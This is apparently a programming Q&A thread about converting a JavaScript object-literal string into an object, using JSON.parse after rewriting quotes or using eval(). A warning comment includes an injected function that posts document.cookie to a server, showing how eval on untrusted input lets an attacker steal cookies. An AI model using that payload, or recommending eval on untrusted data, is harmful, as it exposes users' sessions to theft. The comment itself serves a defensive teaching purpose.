# Get the object from parsed json

Tags: javascript

I have this string `"{sopt:['eq','bw','bn','cn','nc','ew','en']}"`. How to convert it to this `{sopt:['eq','bw','bn','cn','nc','ew','en']}` in javascript?

Comment: Look up how JSON.parse() works maybe?

Answer (score 3, accepted):

Your string is *close* to JSON, but as it stands it's not valid. So you could use [JSON.parse](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/JSON/parse) on it, but you need to make some modifications first:

```
JSON.parse("{sopt:['eq','bw','bn','cn','nc','ew','en']}"
    .replace("sopt", "\"sopt\"") // Wrap the sopt in quotes
    .replace(/'/g, "\"") // Replace all single quotes with doubles
);
```

Answer (score 0):

Try eval() function...

```
var str = "{sopt:['eq','bw','bn','cn','nc','ew','en']}";//string
var json = eval('(' + str + ')');     //json
```

Comment: *Be careful* with this with untrusted data. `var str = "{sopt:['eq','bw','bn','cn','nc','ew',(function() { $.post("/MyServer", document.cookie); })()]}"` - I just stole your cookies and your code still functioned as normal.